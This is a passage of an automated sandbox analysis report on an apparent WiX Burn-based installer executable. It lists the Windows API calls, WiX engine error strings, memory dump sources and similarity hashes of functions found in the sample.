                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-1964378859
                                                                                                                                                                  • Opcode ID: f0d6760b413e12e684aaf7307aec70c5e4369e6d3c4e9345c9ad107c9c83596f
                                                                                                                                                                  • Instruction ID: c9a4259f156f07590c071ef08d9cc4a92630c9e205253229d1ade538497861f3
                                                                                                                                                                  • Opcode Fuzzy Hash: f0d6760b413e12e684aaf7307aec70c5e4369e6d3c4e9345c9ad107c9c83596f
                                                                                                                                                                  • Instruction Fuzzy Hash: EF01C872B4221CBBCF225F80CC0AFDE3A58DB44764F0141A0FE04AA291D375DD919791
                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009115D8
                                                                                                                                                                    • Part of subcall function 009113DA: GetModuleHandleW.KERNEL32(kernel32,00000000,009115E3,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113ED
                                                                                                                                                                    • Part of subcall function 009113DA: GetLastError.KERNEL32(?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113F9
                                                                                                                                                                  • SetDefaultDllDirectories.KERNELBASE ref: 009115FA
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911600
                                                                                                                                                                  • SetDllDirectoryW.KERNEL32 ref: 0091161D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 0091162B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$DefaultDirectoriesDirectoryHandleHeapInformationModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2226491684-0
                                                                                                                                                                  • Opcode ID: 4a20aa905897366dd8e8527b0c7e808cafe89770dad04fedb875cb5773873e9f
                                                                                                                                                                  • Instruction ID: 67dea06dda801c79dd3a5c4dcb2b99c5751895ccc15700ec1f54f5f649cda6db
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a20aa905897366dd8e8527b0c7e808cafe89770dad04fedb875cb5773873e9f
                                                                                                                                                                  • Instruction Fuzzy Hash: C401803272111DBBDB216F21DC099AE7B3DEFC1B907154015E5196B124DA319C829FE0
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,0091D253,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,0091D44C,00000001), ref: 0091A94D
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,?,00000000,?,0091D253,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,0091D44C), ref: 0091A9C1
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy value of variable: %ls, xrefs: 0091A99F
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0091A973
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091A9B1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-3684767681
                                                                                                                                                                  • Opcode ID: 6c94a38dc11e91d48e1f6d004f02dd05c4762ee1a3bef5a42aad7c7f76adcb07
                                                                                                                                                                  • Instruction ID: b124c1e6031399c41b8f1d0e0594d364e31ab37bc0086076f0d4a35c25c11faa
                                                                                                                                                                  • Opcode Fuzzy Hash: 6c94a38dc11e91d48e1f6d004f02dd05c4762ee1a3bef5a42aad7c7f76adcb07
                                                                                                                                                                  • Instruction Fuzzy Hash: 9001847278121CBBDF116F40CC0AFDE3F58AB047A4F114010FD04A92A1D6B59E909B91
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(009560E3,?,00000000,?,009560E3,00000000), ref: 00956100
                                                                                                                                                                  • CloseHandle.KERNEL32(0CC2C95B,?,00000000,?,009560E3,00000000), ref: 00956110
                                                                                                                                                                  • CloseHandle.KERNEL32(EC8B5500,?,00000000,?,009560E3,00000000), ref: 00956121
                                                                                                                                                                  • CloseHandle.KERNEL32(08758B56,?,00000000,?,009560E3,00000000), ref: 00956132
                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(5974F685,00000000,?,009560E3,00000000), ref: 00956144
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 260491571-0
                                                                                                                                                                  • Opcode ID: d8c40e74911e49bf944f1febca2d2f5f6fae134c1a11daa55fc69d4a432097c8
                                                                                                                                                                  • Instruction ID: 2705bf42445f992fcf8cc938951c2374432a368ec0f4467262239bca1654a1dc
                                                                                                                                                                  • Opcode Fuzzy Hash: d8c40e74911e49bf944f1febca2d2f5f6fae134c1a11daa55fc69d4a432097c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 2001E83241AF01DFC7229F16DD04826FBF9FF94752354892DE8AA53525D731A885EF40
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,89504689,000000FF,?,000000FF,00916DEA,00000000,00916CF2,00917162,00916DEA,00916EDE,00000000,00000000,00916CF2,00000000), ref: 0094E6B7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CompareString
• String ID: BA aborted detect forward compatible bundle.$Failed to compare bundle version '%ls' to related bundle version '%ls'$d:\a\wix4\wix4\src\burn\engine\detect.cpp
• API String ID: 1825529933-3048877371
• Opcode ID: db211a187f037ce87c77695fdb5f0c1bbd8a482db7c3cad6e6690582f28e19f3
• Instruction ID: c61a576443ab1c2fd03cf68cedfbd45fd2f57bdcc0be82b892ff649ebcf4e3aa
• Opcode Fuzzy Hash: db211a187f037ce87c77695fdb5f0c1bbd8a482db7c3cad6e6690582f28e19f3
• Instruction Fuzzy Hash: 2641B232A00710FFDB219FA8CC41FAABBF9FF48314F104929F655A2591D771A950DB50
Strings
• Failed to copy provider key for compatible entry., xrefs: 00930C9E
• d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00930CB0, 00930CF3
• Failed to get provider information for compatible package: %ls, xrefs: 00930CE1
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Close
• String ID: Failed to copy provider key for compatible entry.$Failed to get provider information for compatible package: %ls$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
• API String ID: 3535843008-4100048506
• Opcode ID: b49c4d33765fb02db1fc43c5446dc75bbac96e574c97b887cb258c20a9c50fcb
• Instruction ID: 57de3100451256e5f9218a0e9e0f321623ba9f4fedc0eb230d0465553c7846d7
• Opcode Fuzzy Hash: b49c4d33765fb02db1fc43c5446dc75bbac96e574c97b887cb258c20a9c50fcb
• Instruction Fuzzy Hash: C6414F71E4021AFFDB14DFA4CC91BEEBBB4BB44710F104669E529E7280E274A950DFA0
APIs
  • Part of subcall function 00977E27: lstrlenW.KERNEL32(?), ref: 00977EF4
  • Part of subcall function 00977E27: lstrlenW.KERNEL32(00000000), ref: 00977F0A
• GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000000,?,00978702,?,00000000,HEAD,00000000,00000000,00978702,00000000,?,?,00000000,00000000), ref: 00977C79
Strings
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 00977C30
• HEAD, xrefs: 00977C08
• Failed to connect to URL: %ls, xrefs: 00977C21
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Timelstrlen$FileSystem
• String ID: Failed to connect to URL: %ls$HEAD$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
• API String ID: 3954044709-1251758901
• Opcode ID: 08550bfb74bfd5c24a30d35c5d11c2560e869884d7099d3e5bf9bf6ce286961f
• Instruction ID: 09786c148e57e37305c35cc7389e178599d292b58115b6f655771c7eadf97b4e
• Opcode Fuzzy Hash: 08550bfb74bfd5c24a30d35c5d11c2560e869884d7099d3e5bf9bf6ce286961f
• Instruction Fuzzy Hash: EA218172A04219FFDF169F94CD46EAFBBB9EF49700F158169F805A3350D7709E109AA0
APIs
• RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00976717
Strings
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 0097669E, 009766F8
• Failed to open policy key: %ls, xrefs: 00976692
• Failed to open policy key: %ls, name: %ls, xrefs: 009766EC
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Close
• String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
• API String ID: 3535843008-3938230626
• Opcode ID: 1a5c5fcff71b742c95a74bca01c53a0b913262ec9757603505165d48ac970f40
• Instruction ID: 5514b2fcde7d55961a11a8f4de2f8876985b1a6a186028dd8ded05be83e82923
• Opcode Fuzzy Hash: 1a5c5fcff71b742c95a74bca01c53a0b913262ec9757603505165d48ac970f40
• Instruction Fuzzy Hash: EA21EB77A40729BBDF255ED48C86F9E7A6CEB44B94F11C025FE0976190D2B48D20D6D0
APIs
• RegQueryValueExW.ADVAPI32(?,?,?,0092828D,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 0096CD06
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: QueryValue
• String ID: Error reading version registry value due to unexpected data type: %u$Failed to query registry key value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 3660427363-2246233778
• Opcode ID: bb93b935a9256e7aa193fca79af5a900090bb482e2a4ba3f91f1ca13de1e2151
• Instruction ID: c6c9f8a3119cc219a4d7f78ebc5b73c4b35aa6ec483246714f687765fdc7dbaa
• Opcode Fuzzy Hash: bb93b935a9256e7aa193fca79af5a900090bb482e2a4ba3f91f1ca13de1e2151
• Instruction Fuzzy Hash: 4911E6B2A00158B7EB205A158C49FAF7EADDBC6754F25003AFB04A7281E1744E4296F0
APIs
• CompareStringW.KERNEL32(0000007F,?,00000000,000000FF,00000000,000000FF,00000000,?,00981D1C,00000000,00000000,00000000,00000000,00000000), ref: 0097418A
Strings
• Invalid dictionary - bucket size index is out of range, xrefs: 0097410D
• Failed to hash the string., xrefs: 0097414D
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dictutil.cpp, xrefs: 00974121
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CompareString
• String ID: Failed to hash the string.$Invalid dictionary - bucket size index is out of range$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dictutil.cpp
• API String ID: 1825529933-1798595610
• Opcode ID: 7686cd63b2d7b6210eba768c3f73ded3a3d1435f72b37141266784dac0865019
• Instruction ID: 19725f5c6307d3732edb7aa761211b55c6b2b9fb42abb2dd65b30a34630a3c94
• Opcode Fuzzy Hash: 7686cd63b2d7b6210eba768c3f73ded3a3d1435f72b37141266784dac0865019
• Instruction Fuzzy Hash: 68210332758205FBCB10DF88DC85F6AB368FB22724F518214F5189B292C774E990DBA0
APIs
• GetCurrentProcess.KERNEL32(00916EDE,00916DEA,00916DA2,8351EC8B,5300FC65,F6B70F0B,00916DEA,00916D72,00917172,00916D72,00916ECA,00916EDE,00917162,00916DEA,00916EDE,00000000), ref: 00977556
  • Part of subcall function 0096BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,00916E9A,00000001,00916DEA,?,?,?,00977562,00000000), ref: 0096BFE1
  • Part of subcall function 0096BFC9: GetProcAddress.KERNEL32(00000000), ref: 0096BFE8
  • Part of subcall function 0096BFC9: GetLastError.KERNEL32(?,?,?,00977562,00000000), ref: 0096C010
  • Part of subcall function 0097729B: RegCloseKey.ADVAPI32(00000000,00020019,?,?,00916E9A,00000001,00916DEA), ref: 00977376
Strings
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 009775F2
• Failed to query 64-bit related bundles., xrefs: 009775E3
• Failed to query 32-bit related bundles., xrefs: 009775B6
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
• String ID: Failed to query 32-bit related bundles.$Failed to query 64-bit related bundles.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
• API String ID: 3109562764-3570192855
• Opcode ID: d7d639cd6dd8c147554dc2ab77cbb85ed582721e3030ccf52dba68b287bc7b25
• Instruction ID: 9da4a2cb9c1fc4769f0494e7d955e5f32528e5947839f20c7d69dcd2140ce8df
• Opcode Fuzzy Hash: d7d639cd6dd8c147554dc2ab77cbb85ed582721e3030ccf52dba68b287bc7b25
• Instruction Fuzzy Hash: 0021C4B5E41229AFCB51DFA8D885BCEBBF4AB08754F048516F819F7380E7749A408F90
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096CBC2: RegOpenKeyExW.KERNELBASE(?,0096CBBE,00000000,00000000,00000003,00000000,?,?,00976603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0096CBED
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,0092713E,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002), ref: 0096D707
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open key: %ls, xrefs: 0096D6A4
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0096D6B3, 0096D6F0
                                                                                                                                                                  • Failed to read value type: %ls/@%ls, xrefs: 0096D6E1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                  • String ID: Failed to open key: %ls$Failed to read value type: %ls/@%ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 47109696-3852982929
                                                                                                                                                                  • Opcode ID: 9e5452ab200f27eb5670ef22b874b8f4346c180e3e6564f285d8db28e3218e37
                                                                                                                                                                  • Instruction ID: 5a12ceab5b601cea6228a045441d14f4d35f117fe5907fdb6d64ba617eccdf60
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e5452ab200f27eb5670ef22b874b8f4346c180e3e6564f285d8db28e3218e37
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B11E772F41228BBDF219F84CC0AFEE7A69EB49714F004150FE287A191D2B14E50EBD1
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,IGNOREDEPENDENCIES,00000000,00000000,?,?,009303A0,00000000,IGNOREDEPENDENCIES,00000000,00000000), ref: 00925D26
                                                                                                                                                                  Strings
                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 00925CDD
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\package.cpp, xrefs: 00925D6C
                                                                                                                                                                  • Failed to copy the property value., xrefs: 00925D5A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES$d:\a\wix4\wix4\src\burn\engine\package.cpp
                                                                                                                                                                  • API String ID: 1825529933-2032719239
                                                                                                                                                                  • Opcode ID: 914267e72d1813e5a5010ba2ee70148832f6afa4186739a2b0fba5b24ee57fa7
                                                                                                                                                                  • Instruction ID: dd079c1ab54caa1e82293914a0b5643c339abf47ab98799654d0dc0fc3fc31a4
                                                                                                                                                                  • Opcode Fuzzy Hash: 914267e72d1813e5a5010ba2ee70148832f6afa4186739a2b0fba5b24ee57fa7
                                                                                                                                                                  • Instruction Fuzzy Hash: 25112731600625BBDB109B84AC8EFD9B3A4EF44720F320675F715AB2E4D2B0AC50C790
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(0097E860,000000FF,00000000,00000002,?,?,009563B6,00000000,?,?,?), ref: 00956165
                                                                                                                                                                  • ReleaseMutex.KERNEL32(0097E860,?,009563B6,00000000,?,?,?), ref: 009561FB
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                                  • String ID: Failed to allocate memory for message data$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                  • API String ID: 2993511968-954368992
                                                                                                                                                                  • Opcode ID: 948f897f6c02997f6df073188a358f42d8179a01f3f0c14942db87758d38e5d5
                                                                                                                                                                  • Instruction ID: 1e2f3f2ffce7e6e68ec5a559f8e26640216815261a151c4a5dd33767a445660d
                                                                                                                                                                  • Opcode Fuzzy Hash: 948f897f6c02997f6df073188a358f42d8179a01f3f0c14942db87758d38e5d5
                                                                                                                                                                  • Instruction Fuzzy Hash: 57117FB1300615AFCB14CF29DC85FAAB7A8FF49720F104564FA189B3A2D771A8508BA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 009290F5, 00929959
                                                                                                                                                                  • Failed to cache bundle from path: %ls, xrefs: 009290E3
                                                                                                                                                                  • Failed to create registration key., xrefs: 0092912A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to cache bundle from path: %ls$Failed to create registration key.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-2361216137
                                                                                                                                                                  • Opcode ID: 05775b080750e1d12119034ef5fd852aac12cf9849402b33aefa1de2fefc2f45
                                                                                                                                                                  • Instruction ID: f6aa3f7c8f4d4831b88ae0f7806f212700243c09240440cccdb4efe439a7cd3c
                                                                                                                                                                  • Opcode Fuzzy Hash: 05775b080750e1d12119034ef5fd852aac12cf9849402b33aefa1de2fefc2f45
                                                                                                                                                                  • Instruction Fuzzy Hash: 3811E532B44225BBDF12AA91EC4BFEF7A659F48724F100151FB01B91D6D6A1C890DBA1
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009700B5: SysAllocString.OLEAUT32(00000000), ref: 009700C9
                                                                                                                                                                    • Part of subcall function 009700B5: VariantInit.OLEAUT32(?), ref: 009700D5
                                                                                                                                                                    • Part of subcall function 009700B5: VariantClear.OLEAUT32(?), ref: 009701C4
                                                                                                                                                                    • Part of subcall function 009700B5: SysFreeString.OLEAUT32(00000000), ref: 009701CF
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000001), ref: 00970466
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to treat attribute value as UInt64., xrefs: 00970435
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0097040B
                                                                                                                                                                  • failed XmlGetAttribute, xrefs: 009703FC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
